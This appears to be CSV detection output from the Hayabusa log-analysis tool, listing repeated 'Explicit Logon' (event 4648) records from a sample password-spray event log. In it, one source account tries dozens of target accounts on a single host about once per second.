2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
